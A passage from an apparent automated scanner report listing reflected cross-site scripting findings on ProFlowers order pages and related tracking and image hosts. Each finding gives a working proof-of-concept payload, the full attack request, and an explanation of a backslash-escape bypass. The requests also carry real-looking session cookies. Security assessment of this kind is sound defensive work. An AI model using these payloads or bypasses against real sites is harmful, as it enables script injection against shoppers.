Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 87
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:26 GMT
Connection: close

Unable to find /ProvideCommerce/palepink_tnebe78<img src=a onerror=alert(1)>d7b15d166f5

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn

Issue detail

The value of REST URL parameter 9 is echoed unencoded into the response body. The payload e946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86 was submitted in REST URL parameter 9 and was echoed as e946f<img src=a onerror=alert(1)>871e3e70b86 in the application's response.

The response is a text/plain 403 with no X-Content-Type-Options header, so browsers that honour the declared type display the reflected tag rather than parsing it; the onerror handler runs only in a client that sniffs the body as HTML. The reflection shows a missing output-encoding step, but the "High / Certain" rating should be confirmed in a browser before being reported at that level.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tne946f<img%20src%3da%20onerror%3dalert(1)>871e3e70b86?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:29 GMT
Connection: close

Unable to find /ProvideCommerce/summerchocolates08_tne946f<img src=a onerror=alert(1)>871e3e70b86

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload caf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff was submitted in the REST URL parameter 9. This input was echoed as caf6c<img src=a onerror=alert(1)>ef775a487ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tncaf6c<img%20src%3da%20onerror%3dalert(1)>ef775a487ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:18:55 GMT
Connection: close

Unable to find /ProvideCommerce/zinc08_tncaf6c<img src=a onerror=alert(1)>ef775a487ff

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b464'%3balert(1)//95044cf71dc was submitted in the u parameter. This input was echoed as 8b464';alert(1)//95044cf71dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=8b464'%3balert(1)//95044cf71dc HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1244
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split('/')[2]){
var url = '//dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=0&u=8b464';alert(1)//95044cf71dc';
var proto = window.location.protocol.toLowerCase();
if(proto=='https:') url = proto + url;
else url = 'http:' + url;
var now = new Date();
url += '&timecode=' + now.getTime();
if(sirefurl!=nul
...[SNIP]...

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc107\"%3balert(1)//ec98c73342e was submitted in the trackingpgroup parameter. This input was echoed as fc107\\";alert(1)//ec98c73342e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPCfc107\"%3balert(1)//ec98c73342e&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:27 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPCfc107\\";alert(1)//ec98c73342e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7636d\"%3balert(1)//578657e5ceb was submitted in the trackingpgroup parameter. This input was echoed as 7636d\\";alert(1)//578657e5ceb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_carousel&selectedrelationshipID=428685&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/25/2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=HPC7636d\"%3balert(1)//578657e5ceb&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:24:55 GMT
Content-Length: 46950


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "HPC7636d\\";alert(1)//578657e5ceb"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event3";

   if ("" != "") {
       events +
...[SNIP]...

4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f840e\"%3balert(1)//9623d7271fc was submitted in the trackingpgroup parameter. This input was echoed as f840e\\";alert(1)//9623d7271fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

POST /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBSf840e\"%3balert(1)//9623d7271fc&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
Origin: https://orders.proflowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE
Content-Length: 8113

SERVERNAME=ORDER01&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JnBK5JoLsH11eKYPAAbCB9J4CE%2BfEs%2B2jrNxmtLrGIH7KjQenTcoo%2F%2BLYNTaHsT3d%2FkIMPksdO3qKV6sxrf%2ByMhJ20SJav0TObp85l31XC5kQm7gF3Y%2FXdlJicN
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:36:44 GMT
Content-Length: 50700


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBSf840e\\";alert(1)//9623d7271fc"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event6";

   if ("" != "") {
       events +
...[SNIP]...

4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb909\"%3balert(1)//3c15789ae2e was submitted in the trackingpgroup parameter. This input was echoed as cb909\\";alert(1)//3c15789ae2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBScb909\"%3balert(1)//3c15789ae2e&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:28:03 GMT
Content-Length: 62385


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
ured";
   }
   else {
       s.prop33 = "no zip code";
   }
   if ("" != "" && "" == "")
       s.prop34 = "yes";
   else
       s.prop34 = "no";
   s.prop36 = "";
   s.eVar5 = '';
   if (s.eVar5 == "")
   { s.eVar5 = "PBScb909\\";alert(1)//3c15789ae2e"; }
   s.eVar8 = "";
   s.eVar18 = "0";
   s.eVar19 = "";
   s.eVar21 = getReminderCount();
   s.eVar45 = "OrderProcess_NewOrder";
   s.eVar46 = "0";
   var events = "event42";

   if ("" != "") {
       events
...[SNIP]...

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d3d\"%3balert(1)//c331d736d2e was submitted in the trackingpgroup parameter. This input was echoed as 66d3d\\";alert(1)//c331d736d2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS66d3d\"%3balert(1)//c331d736d2e&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
